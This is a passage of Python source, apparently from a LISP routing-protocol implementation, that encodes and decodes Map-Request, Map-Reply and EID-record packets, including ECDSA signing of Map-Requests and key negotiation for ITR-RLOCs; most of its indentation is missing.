if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in the file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
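# A sketch of the signed hash input described above, as built by
# sign_map_request() and checked by verify_map_request_sig() in the class
# below (illustrative; key loading elided):
#
#   sig_data = lisp_hex_string(nonce) + source_eid_str + target_eid_str
#   signature = signing_key.sign(sig_data)
#   json = { "source-eid" : source_eid_str, "signature-eid" : sig_eid_str,
#            "signature" : binascii.b2a_base64(signature) }
#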
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
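
#
# Illustrative sketch (not called anywhere): the xTR-ID is a 128-bit value
# carried as the last 16 bytes of a Map-Request when the xtr_id_present bit
# is set. It is split into two 64-bit words, each passed through the
# module's byte_swap_64() helper, mirroring encode_xtr_id() and
# decode_xtr_id() above.
#
def example_xtr_id_roundtrip(xtr_id):
    upper = byte_swap_64(xtr_id >> 64)
    lower = byte_swap_64(xtr_id & 0xffffffffffffffff)
    packet = struct.pack("QQ", upper, lower)

    #
    # Decoding reverses the swap and reassembles the 128-bit value.
    #
    upper, lower = struct.unpack("QQ", packet)
    decoded = (byte_swap_64(upper) << 64) | byte_swap_64(lower)
    return(decoded == xtr_id)
#enddef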
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
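
#
# Illustrative sketch (not called anywhere): the first long of a Map-Reply
# packs the type, the R/E/S flags, the hop-count, and the record-count, as
# pictured in the header diagram above. This mirrors the masks used in
# lisp_map_reply.decode().
#
def example_parse_map_reply_first_long(first_long):
    first_long = socket.ntohl(first_long)
    return({
        "type" : first_long >> 28,
        "rloc-probe" : bool(first_long & 0x08000000),
        "echo-nonce-capable" : bool(first_long & 0x04000000),
        "security" : bool(first_long & 0x02000000),
        "hop-count" : (first_long >> 8) & 0xff,
        "record-count" : first_long & 0xff
    })
#enddef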
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire set of locator records is encrypted with the
# chacha cipher.
#
# And this is for an EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
